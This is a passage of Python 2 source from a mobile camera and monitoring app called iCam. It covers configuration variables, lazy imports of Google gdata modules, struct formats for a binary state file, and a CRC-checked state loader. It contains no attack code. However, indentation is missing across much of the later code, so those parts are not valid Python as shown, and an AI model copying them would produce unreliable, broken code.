    # non-Symbian platforms - TODO confirm with the viewfinder code.
    VIEWFINDER_SIZE_ORIG = (-1, -1)
# SIZE_VIEWFINDER = (320, 240)
# SIZE_VIEWFINDER = (512, 384)
# SIZE_VIEWFINDER = (640, 480)
viewFinderSize = VIEWFINDER_SIZE_ORIG
readGPS = 0  # False
gpsInfo = {"position": {}, "course": {}, "satellites": {}}
# We assume 2 cameras by default.
numCamerasSupported = 2
"""
The default configuration for the application.
pauseInterval represents the interval of time the system waits between media
capture actions (video recordings, take photos).
NOT USED: pauseInterval represents the interval of time the system waits in a
Reactive loop.
"""
PAUSE_INTERVAL_POWER_MANAGED = 10 * 60 * 60  # 10 hours
pauseInterval = 120  # 2 minutes
"""
YouTube (and Picasa?) might give exceptions if uploading too often videos,
delete, create or delete new playlists --> we wait between such
consecutive operations.
"""
pauseIntervalGdata = 60
digitalZoom = 0  # no zoom
photoResolutionIndex = 6  # 320x240
photoModeIndex = [3, 2]  # JPEG_Exif, RGB24
photoQuality = 50  # 50% quality
exposureIndex = [0] * 2
whiteBalanceIndex = [0] * 2
flashIndex = 1
audioRecordDuration = 0
videoRecordDuration = [30, 30]  # [0, 0] #[0, 7]
rotateDegreesImage = 0
localQualityIndex = 0
localPhotoResolutionIndex = [None, None]
# 0 = None, 1 = Only Video, 2 = Only Photo, 3 = Both Photo and Video
cameraMode = [1, 0]
if RASPBIAN_OS:  #!!!!TODO: doesn't work well - try more
    cameraMode = [2, 0]
# Currently cannot record video on iOS
if iOS_PYOBJC:
    cameraMode = [2, 0]
videoAudioEnabled = 1  # True #False
localVideoModeIndex = [0, 0]  # [None, None]
"""
0 = no local storage;
1 = store all media (on SD card);
in the future, we should have other values as well
(e.g., 2 = store only movies, but not photos)
"""
storeLocallyMedia = 1
"""
orientationForThisPhoneModel on Symbian has to do with the orientation of the
camera. It can be "portrait" (normal) or "landscape".
"""
orientationForThisPhoneModel = "portrait"  #"landscape"
# GSM cell info; -1 means "unknown / not read yet".
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
phoneModel = ""
# We can use lookup after deviceId to get the phoneNumber
# phoneNumber = "no_phone_number" + phoneModel
phoneNumber = "no_phone_number"
# 0 is None; 1 is BT server; 2 is BT client
bluetoothMode = 0
bluetoothServerAddress = ""
bluetoothSelfAddress = "00:00:00:00:00:00"  # ""
bluetoothSelfName = ""
cameraPhotoSizes_JPEG_Exif = [None, None]
cameraPhotoSizes_RGB24 = [None, None]
"""
cameraVideoFormats = [None, None]
cameraVideoFrameSizes = [None, None]
cameraVideoModes = [None, None]
"""
cameraVideoFormats = [[], []]  # Ex: cameraVideoFormats[1] = ['EFormatYUV420Planar']
cameraVideoFrameSizes = [[], []]  # Ex: cameraVideoFrameSizes[1] = [(640, 480), (352, 288), (320, 240), (176, 144)]
cameraVideoModes = [[], []]  # Ex: cameraVideoModes[1] = [{"rate": 15.0, "size": (176, 144)}]
myMaxRamdriveSize = -1
differentPixelsPercentage = 10
differentPixelsPercentageThreshold = [-1, -1]
stateTime = None
# Dawn/dusk times; -1 entries appear to mean "not computed yet" - TODO
# confirm where these vectors get filled in.
dawnTimeVec = [-1, -1, -1]
duskTimeVec = [-1, -1, -1]
"""
When the phone receives internetUploadMaxErrors upload errors we Quit iCam.
This is extremely useful for SYMBIAN_OS, where we programatically connect
to the AP when iCam starts, so restarting iCam is certain to reconnect
to the AP.
The value should be at least specific per type of
mobile OS - to be set accordingly.
"""
internetUploadMaxErrors = 20  #100
"""
Used for InternetUploadBinaryData() and YouTubeVideoUpload().
TODO:!!!! use it for PicasaPhotoUpload(), as well.
"""
internetUploadErrorsCounter = 0
# Upload all BT messages.
# Upload that many videos in reverse chronological order:
uploadHowManyOfLatestBluetoothMessages = 4  # 5
# Upload that many videos in chronological order - not really great if there are many:
#uploadHowManyOfLatestBluetoothMessages = -1
###############################################################################
###############################################################################
###############################################################################
###########################END STATE VARIABLES#################################
###############################################################################
###############################################################################
"""
Have to declare atom and gdata global in order to import the modules in the
global scope in ImportGdataModules().
"""
atom = None
gdata = None
gdataModulesImported = False
"""
In PyS60 I cannot bypass the standard library module loading.
Hence we need to load the module ourselves, before any other (sub)module.
Once we load the module M explicitly, it is in the program modules dictionary
and any subsequent module that loads the module M will refer to this module
and will not load again the module.
Note that although the import gets lost when leaving ImportMyModule() since it is
local, it seems that the operations performed are enough in order to load the
second time the module from the same path as here.
"""
"""
# Just for testing purposes
array = None
def ImportArray():
if WINDOWS_OS:
if sys.version_info[0 : 2] != (2, 2):
return
else:
return
try:
import imp
DebugPrint(str(imp.find_module("array"))
#modulePathFileName = "C:\\Python22_S60\Lib\\urlparse.py"
if True: #False:
modulePathFileName = "C:\\Python22\\Lib\\site-packages\\array.py"
fInput = open(modulePathFileName, "rb")
global array
array = imp.load_module("array", fInput, modulePathFileName, ('.py', 'r', 1))
DebugPrint("Alex: %s" % str(array))
except:
DebugPrintErrorTrace()
ImportArray()
"""
#urlparse = None
def ImportMyModule():
    """Manually (re)load a module from an explicit path (PyS60 workaround).

    In PyS60 the standard module loading cannot be bypassed, so a module
    sometimes has to be loaded explicitly before any submodule that needs
    it. NOTE: both load paths below are guarded by "if False", i.e. this
    function is currently a no-op kept for reference/debugging.
    """
    try:
        import imp
        #DebugPrint(str(imp.find_module("urlparse"))
        if False:
            modulePathFileName = "C:\\Python22_S60\\Lib\\site-packages\\urlparse.py"
            fInput = open(modulePathFileName, "rb")
            res = imp.load_module("urlparse", fInput, modulePathFileName, ('.py', 'r', 1))
            #DebugPrint("Alex: %s" % str(res))
            modulePathFileName = "E:\\Private\\e21e55e0\\site-packages\\urlparse.pyc"
            fInput = open(modulePathFileName, "rb")
            res = imp.load_compiled("urlparse", modulePathFileName, fInput)
            #DebugPrint("Alex: %s" % str(res))
    except Exception:
        DebugPrintErrorTrace()
def ImportGdataModules():
    """Lazily import the gdata/atom modules (idempotent).

    Sets the module-global gdataModulesImported flag on success; on any
    import failure it logs the traceback and leaves the flag False so a
    later call can retry. Which submodules get imported depends on the
    uploadMediaToYouTube / uploadMediaToPicasa configuration flags.
    """
    global atom, gdata
    global gdataModulesImported
    DebugPrint("Entered ImportGdataModules(): gdataModulesImported = %d." % \
                gdataModulesImported)
    if not gdataModulesImported:
        try:
            if gdata is None:
                import gdata
            #if sys.version_info[0 : 2] == (2, 2):
            if SYMBIAN_OS:
                if not _PyS60_1_9_OR_NEWER:
                    # Pre-1.9 PyS60 needs modules loaded by hand first.
                    ImportMyModule()
                # The tlslite imports are each tried independently so a
                # failure in one does not prevent trying the next.
                try:
                    import gdata.tlslite
                except Exception:
                    DebugPrintErrorTrace()
                try:
                    import gdata.tlslite.utils
                except Exception:
                    DebugPrintErrorTrace()
                try:
                    import gdata.tlslite.utils.keyfactory
                except Exception:
                    DebugPrintErrorTrace()
            if uploadMediaToYouTube or uploadMediaToPicasa:
                # if atom is None:
                import atom
                # As suggested in http://effbot.org/zone/import-confusion.htm
                # atom = __import__("atom") would also work, but not for
                # "gdata.youtube" because that module is written trickier.
                # See maybe http://docs.python.org/release/2.5.2/ref/import.html
                import gdata.media
            if uploadMediaToYouTube:
                import gdata.youtube
                import gdata.youtube.service
            if uploadMediaToPicasa:
                import gdata.photos
                # Gives MemoryError if I use default.py directly
                import gdata.photos.service
            import gdata.tlslite.utils.Python_AES
            gdataModulesImported = True
        except Exception:
            gdataModulesImported = False
            DebugPrint("Not able to import the gdata (and atom) modules.")
            DebugPrintErrorTrace()
"""
We try to be "lazy" (as in lazy evaluation) in importing the gdata modules -
we want to import them ALAP.
"""
"""
googleUsername = "MOBILEREVIVAL"
# Note that googleKeywords could also store location, phone name, etc:
googleKeywords = "Cernica N82"
"""
googleUsername = None
googlePassword = None
googlePasswordEncrypted = None
googleKeywords = deviceId
"""
This is the keyword that we add for all devices in the BT network.
TODO!!!!: The keyword should be added through UI at the BT server.
"""
btNetSearchKeywords = "Cernica" #N82"
"""
if ANDROID_OS:
#googleKeywords = GetPhoneModel() #"Android device"
elif SYMBIAN_OS:
#googleUsername = "ender..."
#googleKeywords = "E7"
googleKeywords = deviceId
"""
"""
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
"""
# if gdataModulesImported:
"""
# OLD meaning: useiCamServer = 0 # 0 = just state, 1 = all
useiCamServer:
0 = no (none),
1 = no Media upload (state, log, download updates and commands),
2 = all (upload State + Media, download updates and commands)
"""
useiCamServer = None
if (SYMBIAN_OS and S60_EDITION[0] >= 3) or ANDROID_OS or iOS_PYOBJC:
uploadMediaToYouTube = 1
uploadMediaToPicasa = 1
useiCamServer = 0 # 1
if deviceId == IMEI_E7:
uploadMediaToIQEngines = 0 # 1
else:
uploadMediaToIQEngines = 0
else:
"""
On WINDOWS_CE_OS_PYTHONCE I don't have (yet) OpenSSL so gdata complains
(ssl module not found or so) and I can't login to Google gdata servers.
On WINDOWS_OS I normally prefer to test intranet performance with the iCam
server running on the Linux VMWare box.
"""
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
uploadMediaToIQEngines = 0
googleRememberPassword = 1
googleMediaPrivate = 1
if WINDOWS_CE_OS_PYTHONCE:
ImportGdataModules()
googleUsername = ""
# For test only.
"""
Yes, we use one space because StoreLocalConfigInFile() requires at least 1
char to generate an encrypted password. :)
"""
googlePassword = " "
googlePasswordEncrypted = ""
# StoreLocalConfigInFile()
###############################################################################
###############################################################################
###############################################################################
###########################END CONFIG VARIABLES################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
#######################BEGIN STATE LOAD/STORE FUNCTIONS########################
###############################################################################
###############################################################################
import struct
"""
!!!!IMPORTANT: do not change easily deviceIdFormat and statePackFormat*,
since we use them in quite a few places.
"""
deviceIdFormat = "<100s"
# See http://docs.python.org/2/library/struct .
# Note: <i is 32 bits long integers, in little endian format.
"""
Format C Type Python type Standard size Notes
x pad byte no value
c char string of length 1 1
b signed char integer 1 (3)
B unsigned char integer 1 (3)
? _Bool bool 1 (1)
h short integer 2 (3)
H unsigned short integer 2 (3)
i int integer 4 (3)
I unsigned int integer 4 (3)
l long integer 4 (3)
L unsigned long integer 4 (3)
q long long integer 8 (2), (3)
Q unsigned long long integer 8 (2), (3)
f float float 4 (4)
d double float 8 (4)
s char[] string
p char[] string
P void * integer (5), (3)
"""
# statePackFormat = "<iiiiiiii"
# sizeStateMarshalled
statePackFormat00 = "<i"
"""
bbbB
uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
internetUploadMaxErrors,
ibbbb
BATTERY_LEVEL_THRESHOLD,
reactiveLoopOpsIndex, sentBTMessageTo6680, 0, 0,
ii
mediaFileSize, 0,
i
uploadHowManyOfLatestBluetoothMessages,
bbb
modeManagerIsEnabled, startAutomatically, saveUnsentPackets,
b
uploadUnsentData,
bbbb
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, MY_DEBUG_UPLOAD_MSG
"""
statePackFormat01 = "<bbbBibbbbiiibbbbbbbb"
"""
!!!!IMPORTANT: do not change easily statePackFormat02 since we use it in
GetInfoFromSMFBtMsg(), the least.
"""
# accessPointName, MAC bluetoothSelfAddress (the 6 bytes), tmpBluetoothServerAddress, cameraId
statePackFormat02 = "<44sBBBBBB20si"
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday, crtTime.tm_hour,
# crtTime.tm_min, crtTime.tm_sec, numMilliseconds
#statePackFormat03 = "<iiiiiii"
statePackFormat03 = "<iibbbbi"
#int(GetTime()), 0, 0
statePackFormat03b = "<iii"
# GetBatteryLevelPercentage(), main_drive_free_space, memory_card_free_space,
# GetFreeRAM(), 0, sysagent.charger_status()
statePackFormat04 = "<iqqiii"
# The 2s is for the signalUnits. signalStrength
statePackFormat05 = "<2si"
# pauseIntervalGdata,pauseInterval,burstModeIsStarted,
# photoResolutionIndex, 0, localPhotoResolutionIndex[0],
# localPhotoResolutionIndex[1], photoModeIndex[0]
statePackFormat06 = "<iiiiiiii"
# photoModeIndex[1], digitalZoom, 0, photoQuality, 0, exposureIndex[0],
# exposureIndex[1]
statePackFormat07 = "<iiiiiii"
# whiteBalanceIndex[0], whiteBalanceIndex[1], flashIndex, 0
statePackFormat08 = "<iiii"
# 0, 0, 0, 0, 0, 0, 0, 0. Indices for:
# ExposureCompensation, ISO, contrast, sharpness, color tone, Scene Modes
statePackFormat09 = "<32s32s32s32s"
# Reserved (ex: ShutterSpeed)
# Reserved: indices for localVideoMode (VideoFrameRates, VideoEncoding),
# Video Stabilization, Audio Recording, etc
# (Note: Camera app on S60 on N82 has presets: TV High Quality,
# TV Normal Quality, Email High Quality, Email Normal Quality,
# Sharing Quality)
# Reserved (ex: sent videoResolution)
# videoRecordDuration[0], videoRecordDuration[1], localVideoModeIndex[0],
# localVideoModeIndex[1], cameraMode[0], cameraMode[1], videoAudioEnabled,
# 0 (maybe videoAudioEnabled camera with id 1),
statePackFormat10 = "<iiiibbbb"
# Reserved (ex: audioType - MP3 or AMR)
statePackFormat11 = "<20s"
# audioRecordDuration, 0, 0, 0, 0, 0, 0 (reserved for other durations)
statePackFormat12 = "<i24s"
# rotateDegreesImage, the rest is reserved
statePackFormat13 = "<i28s"
# mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId
statePackFormat14 = "<iiii"
# Reserved
statePackFormat15 = "<32s"
# storeLocallyMedia. And reserved for "Choose when to send Unsent", plugged
# and charging or not
statePackFormat16 = "<i28s"
# motionDetectionIsOn, differentPixelsPercentageThreshold[0];
# Reserved for noiseDetectionEnabled, faceDetection,
# soundDetection (a human talking, a dog barking, a bird singing)
statePackFormat17 = "<if24s"
# Reserved for motion detection params (thresholds, etc)
statePackFormat18 = "<32s32s32s32s"
# Reserved for the result(s) returned by the simple detection algorithm(s).
# Reserved for the result(s) returned by the simple detection algorithm(s).
# Reserved for the result(s) returned by the simple detection algorithm(s).
# Reserved (ex: readGPS)
statePackFormat19 = "<32s"
# GPS data (gpsInfo)
statePackFormat20 = "<dddddddddddddii"
# Reserved for gps related.
statePackFormat21 = "<32s32s"
# logAccelerometerAndRotationSensors, and reserved
statePackFormat22 = "<i28s"
# 14 * 32 bytes (strings) reserved. fileName
# statePackFormat23 = "<32s32s32s32s32s32s32s32s32s32s32s32s32s32s256s"
# 13 * 32 bytes (strings) reserved.
statePackFormat23 = "<32s32s32s32s32s32s32s32s32s32s32s32s32s"
# Reserved dawnTimeVec[0], dawnTimeVec[1], dawnTimeVec[2], 0, duskTimeVec[0],
# duskTimeVec[1], duskTimeVec[2], 0
statePackFormat24 = "<20sbbbbbbbb"
statePackFormat25 = "<i" # No value: 0
statePackFormat26 = "<128s" # fileName
statePackFormat27 = "<124s" # ICAM_SERVER_NAME
statePackFormat28 = "<i" # CRC32 of the state
statePackFormat = statePackFormat00 + statePackFormat01[1:] + \
statePackFormat02[1:] + statePackFormat03[1:] + statePackFormat03b[1:] + \
statePackFormat04[1:]
statePackFormat += statePackFormat05[1:] + statePackFormat06[1:] + \
statePackFormat07[1:] + statePackFormat08[1:] + \
statePackFormat09[1:]
statePackFormat += statePackFormat10[1:] + statePackFormat11[1:] + \
statePackFormat12[1:] + statePackFormat13[1:] + \
statePackFormat14[1:]
statePackFormat += statePackFormat15[1:] + statePackFormat16[1:] + \
statePackFormat17[1:] + statePackFormat18[1:] + \
statePackFormat19[1:]
statePackFormat += statePackFormat20[1:] + statePackFormat21[1:] + \
statePackFormat22[1:] + statePackFormat23[1:] + \
statePackFormat24[1:]
statePackFormat += statePackFormat25[1:] + statePackFormat26[1:] + \
statePackFormat27[1:] + statePackFormat28[1:]
def LoadStateFromFile(pathFileName, myDebugStdout=MY_DEBUG_STDOUT, \
myDebugStderr=MY_DEBUG_STDERR):
global burstModeIsStarted, photoResolutionIndex, photoQuality, \
pauseInterval, pauseIntervalGdata, digitalZoom
global localPhotoResolutionIndex, photoModeIndex, exposureIndex, \
whiteBalanceIndex, flashIndex
global startViewfinderBeforeTakingPhoto
global audioRecordDuration, videoRecordDuration
global localVideoModeIndex, cameraMode, videoAudioEnabled
global accessPointName, bluetoothServerAddress
global motionDetectionIsOn, differentPixelsPercentageThreshold
global rotateDegreesImage
global statePackFormat
global storeLocallyMedia
global modeManagerIsEnabled, dawnTimeVec, duskTimeVec
global startAutomatically
global BATTERY_LEVEL_THRESHOLD
global reactiveLoopOpsIndex
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
MY_DEBUG_UPLOAD_MSG
global ICAM_SERVER_NAME
global saveUnsentPackets, uploadUnsentData, internetUploadMaxErrors, \
uploadHowManyOfLatestBluetoothMessages
global sentBTMessageTo6680
global stateTime
if myDebugStdout:
print "Entered LoadStateFromFile(pathFileName = %s)." % pathFileName
sys.stdout.flush()
try:
"""
if myDebugStdout:
print "os.path.isfile(%s) = %s." % (pathFileName,
os.path.isfile(pathFileName))
sys.stdout.flush()
"""
# pathFileNameBackup = STATE_PATH_FILENAME_BACKUP
pathFileNameBackup = pathFileName + STATE_BACKUP_EXTENSION
if not os.path.isfile(pathFileName):
if myDebugStdout:
print "The state file %s doesn't exist." % pathFileName
sys.stdout.flush()
if os.path.isfile(pathFileNameBackup):
if myDebugStdout:
print "We found the backup of the state file (%s) --> " \
"we restore it as the original state file." % \
pathFileNameBackup
sys.stdout.flush()
MoveFileBetweenAnyDrives(pathFileNameBackup, pathFileName)
else:
# pathFileName = pathFileNameBackup
return False
try:
fInput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
fileData = fileData.decode("zlib")
except:
"""
There was an error reading pathFileName (it happened once that
state.bin was 0 bytes)
"""
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
try:
if os.path.isfile(pathFileNameBackup):
if myDebugStdout:
print "The state file %s is invalid. We found the " \
"backup of the state file (%s) --> we restore"\
" it as the original state file." % \
(pathFileName, pathFileNameBackup)
sys.stdout.flush()
os.unlink(pathFileName)
MoveFileBetweenAnyDrives(pathFileNameBackup, pathFileName)
# pathFileName = pathFileNameBackup
fInput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
fileData = fileData.decode("zlib")
else:
return False
except:
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
return False
stateSize = struct.calcsize(statePackFormat)
(crc32, ) = struct.unpack(statePackFormat28, \
fileData[stateSize - 4 : stateSize])
crtCrc32 = binascii.crc32(fileData[0 : stateSize - 4])
if myDebugStdout:
print "LoadStateFromFile(): crtCrc32 = 0x%X, crc32 = 0x%X" % \
(crtCrc32, crc32)
if (crtCrc32 != crc32) or (crc32 == 0):
if myDebugStdout:
print "LoadStateFromFile(): CRC error: " \
"crtCrc32 = 0x%X, crc32 = 0x%X --> bailing out." % \
(crtCrc32, crc32)
return False
"""
Note: uploadMediaToYouTube, uploadMediaToPicasa,
useiCamServer are stored and loaded from
LOCAL_CONFIG_PATH_FILENAME
uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
_, _, _, _, _, uploadHowManyOfLatestBluetoothMessages, _,
startAutomatically, modeManagerIsEnabled, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG,
_, _, _, _, BATTERY_LEVEL_THRESHOLD, _, internetUploadMaxErrors, _,
uploadHowManyOfLatestBluetoothMessages, modeManagerIsEnabled,
startAutomatically, saveUnsentPackets, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG,
"""
(sizeStateMarshalled,
# IMPORTANT: the first three wildcards represent the
# uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer.
# Altough they are being stored in both the state and config data,
# they are reloaded only from the config file iCam.cfg.
_, _, _, internetUploadMaxErrors, BATTERY_LEVEL_THRESHOLD,
reactiveLoopOpsIndex, sentBTMessageTo6680, _, _,
_, _, # mediaFileSize, ...
uploadHowManyOfLatestBluetoothMessages, modeManagerIsEnabled,
startAutomatically, saveUnsentPackets, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG,
accessPointName, _, _, _, _, _, _, # bluetoothSelfAddress in 6 bytes
bluetoothServerAddress, _, # cameraId,
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday,
_, _, _,
# crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec, numMilliseconds
_, _, _, _,
# int(GetTime()), 0, 0,
stateTime, _, _,
# GetBatteryLevelPercentage(), main_drive_free_space,
# memory_card_free_space, GetFreeRAM(), 0, charger_status,
_, _, _, _, _, _,
# signalUnits, signalStrength,
_, _,
pauseIntervalGdata, pauseInterval,
# burstModeIsStarted, photoResolutionIndex, _, ...
_, photoResolutionIndex, _, localPhotoResolutionIndex[0],
localPhotoResolutionIndex[1], photoModeIndex[0],
# First _ is for opticalZoom
photoModeIndex[1], digitalZoom, _, photoQuality, _,
exposureIndex[0], exposureIndex[1],
whiteBalanceIndex[0], whiteBalanceIndex[1], flashIndex,
startViewfinderBeforeTakingPhoto,
#"", (0, 0, 0, 0, 0, 0, 0, 0,) - Indices for:
# ExposureCompensation, ISO, contrast, sharpness, color tone,
# Scene Modes
_,
#"", #0, 0, 0, 0, 0, 0, 0, 0, - Reserved (ex: ShutterSpeed)
_,
#"", #0, 0, 0, 0, 0, 0, 0, 0, - Indices for
# localVideoMode (VideoFrameRates, VideoEncoding),
# Video Stabilization, Audio Recording, etc
# (Note: Camera app on S60 on N82 has presets: TV High Quality,
# TV Normal Quality, Email High Quality, Email Normal Quality,
# Sharing Quality)
_,
#"", 0, 0, 0, 0, 0, 0, 0, 0, - Reserved (ex: sent videoResolution)
_,
videoRecordDuration[0], videoRecordDuration[1],
localVideoModeIndex[0], localVideoModeIndex[1],
cameraMode[0], cameraMode[1], videoAudioEnabled, _,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved
# (ex: audioType - MP3 or AMR)
_,
#"" (0, 0, 0, 0, 0, 0,) - Reserved for other durations
audioRecordDuration, _,
# rotateDegreesImage, "" (0, 0, 0, 0, 0, 0, 0,)
rotateDegreesImage, _,
# mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId,
_, _, _, _,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - reserved
_,
#storeLocallyMedia, "", (0, 0, 0, 0, 0, 0, 0)
# Reserved for choose when to send Unsent, plugged and charging
# or not
storeLocallyMedia, _,
# "" (0, 0, 0, 0, 0, 0, 0,) - Reserved for noiseDetectionEnabled,
# faceDetection, soundDetection (a human talking, a dog barking,
# a bird singing)
motionDetectionIsOn, differentPixelsPercentageThreshold[0], _,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for motion detection
# params (thresholds, etc)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for the result(s)
# returned by the simple detection algorithm(s)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for the result(s)
# returned by the simple detection algorithm(s)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for the result(s)
# returned by the simple detection algorithm(s)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved (ex: readGPS)
_,
_, # gpsInfo["position"]["latitude"],
_, # gpsInfo["position"]["longitude"],
_, # gpsInfo["position"]["altitude"],
_, # gpsInfo["position"]["vertical_accuracy"],
_, # gpsInfo["position"]["horizontal_accuracy"],
_, # gpsInfo["course"]["speed"],
_, # gpsInfo["course"]["heading"],
_, # gpsInfo["course"]["heading_accuracy"],
_, # gpsInfo["course"]["speed_accuracy"],
_, # gpsInfo["satellites"]["horizontal_dop"],
_, # gpsInfo["satellites"]["vertical_dop"],
_, # gpsInfo["satellites"]["time_dop"],
_, # gpsInfo["satellites"]["time"],
_, # gpsInfo["satellites"]["used_satellites"],
_, # gpsInfo["satellites"]["satellites"],
_, # 0, 0, 0, 0, 0, 0, 0, 0, - reserved
_, # 0, 0, 0, 0, 0, 0, 0, 0, - reserved
# logAccelerometerAndRotationSensors, "" (0, 0, 0, 0, 0, 0, 0,)
# reserved (ex: light sensor, temperature, humidity,
# body physiology, tap sensor, gyro, etc)
_, _,
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, dawnTimeVec[0], dawnTimeVec[1], dawnTimeVec[2], _,
duskTimeVec[0], duskTimeVec[1], duskTimeVec[2], _, #"" (20s), etc
_, _, ICAM_SERVER_NAME, # fileNameStr, ICAM_SERVER_NAME
crc32
) = struct.unpack(statePackFormat,
# Length of string given as arg in unpack() must be calcsize(fmt).
fileData[0 : stateSize])
firstNullCharIndex = accessPointName.find("\x00")
if firstNullCharIndex != -1:
accessPointName = accessPointName[0 : firstNullCharIndex]
# print "len(fileName) =", len(fileName)
accessPointName = unicode(accessPointName)
firstNullCharIndex = bluetoothServerAddress.find("\x00")
if firstNullCharIndex != -1:
bluetoothServerAddress = \
bluetoothServerAddress[0 : firstNullCharIndex]
# print "len(fileName) =", len(fileName)
firstNullCharIndex = ICAM_SERVER_NAME.find("\x00")
if firstNullCharIndex != -1:
ICAM_SERVER_NAME = ICAM_SERVER_NAME[0 : firstNullCharIndex]
global bluetoothMode
if bluetoothServerAddress == "":
bluetoothMode = -1
elif bluetoothServerAddress == "no_BT":
bluetoothMode = 0
bluetoothServerAddress = ""
elif bluetoothServerAddress == "BTServer":
bluetoothMode = 1
bluetoothServerAddress = ""
else:
bluetoothMode = 2
except:
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
return False
try:
if myDebugStdout:
print "LoadStateFromFile(): accessPointName = %s, " \
"bluetoothServerAddress = %s, bluetoothMode = %d, " \
"pauseInterval = %d, " \
"cameraMode[0] = %d, cameraMode[1] = %d, " \
"burstModeIsStarted = %d, photoResolutionIndex = %d, " \
"localPhotoResolutionIndex[0] = %d, " \
"localPhotoResolutionIndex[1] = %d" % \
(
accessPointName,
bluetoothServerAddress, bluetoothMode,
pauseInterval,
cameraMode[0], cameraMode[1],
burstModeIsStarted, photoResolutionIndex,
localPhotoResolutionIndex[0],
localPhotoResolutionIndex[1],
)
print "LoadStateFromFile(): " \
"photoModeIndex[0] = %d, photoModeIndex[1] = %d, " \
"digitalZoom = %d, photoQuality = %d, " \
"exposureIndex[0] = %d, exposureIndex[1] = %d, " \
"BATTERY_LEVEL_THRESHOLD = %d." % \
(
photoModeIndex[0], photoModeIndex[1],
digitalZoom, photoQuality,
exposureIndex[0], exposureIndex[1],
BATTERY_LEVEL_THRESHOLD,
)
print "LoadStateFromFile(): " \
"whiteBalanceIndex[0] = %d, whiteBalanceIndex[1] = %d, " \
"flashIndex = %d." % \
(
whiteBalanceIndex[0], whiteBalanceIndex[1],
flashIndex
)
print "LoadStateFromFile(): audioRecordDuration = %d, " \
"videoRecordDuration[0] = %d, videoRecordDuration[1] = %d, " \
"videoAudioEnabled = %d, uploadUnsentData = %d, " \
"storeLocallyMedia = %d, motionDetectionIsOn = %d." % \
(
audioRecordDuration,
videoRecordDuration[0], videoRecordDuration[1],
videoAudioEnabled, uploadUnsentData,
storeLocallyMedia, motionDetectionIsOn,
)
print "LoadStateFromFile(): MY_DEBUG_STDOUT = %d, " \
"MY_DEBUG_STDERR = %d, MY_DEBUG_STDERR_2 = %d, " \
"MY_DEBUG_UPLOAD_MSG = %d." % \
(MY_DEBUG_STDOUT, MY_DEBUG_STDERR,
MY_DEBUG_STDERR_2, MY_DEBUG_UPLOAD_MSG)
print "LoadStateFromFile(): startAutomatically = %d.\n" % \
startAutomatically
sys.stdout.flush()
except:
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
return True
return True
# Sentinel "file name" packed into the state when no media file accompanies
# the packet (see BuildState(): it maps this, like None, to an empty string).
NO_MEDIA_FILE_NAME = "[!NO_FILE]"
"""
IMPORTANT: The (local) state does NOT contain the deviceId.
"""
def BuildState(cameraId, crtTime, numMilliseconds, fileName, pathFileName):
    """Marshal the current application state into one binary packet.

    The layout is given by the statePackFormat* struct format strings
    (declared elsewhere in this file) and mirrors what
    LoadStateFromFile() unpacks.  IMPORTANT: the (local) state does NOT
    contain the deviceId.

    cameraId        -- numeric camera id stored in the state.
    crtTime         -- time.struct_time with the current date/time.
    numMilliseconds -- millisecond component of the current time.
    fileName        -- media file name to advertise; None or
                       NO_MEDIA_FILE_NAME means "no media file".
    pathFileName    -- full path of the media file, consulted only to
                       read its size with os.path.getsize().

    Returns the marshalled state string (reserved fields null-padded,
    trailing CRC32 appended), or None if an exception occurred (the
    traceback is logged via DebugPrintErrorTrace()).
    """
    global accessPointName, bluetoothMode, bluetoothServerAddress
    global signalUnits, signalStrength, pauseInterval, \
            burstModeIsStarted, photoResolutionIndex, \
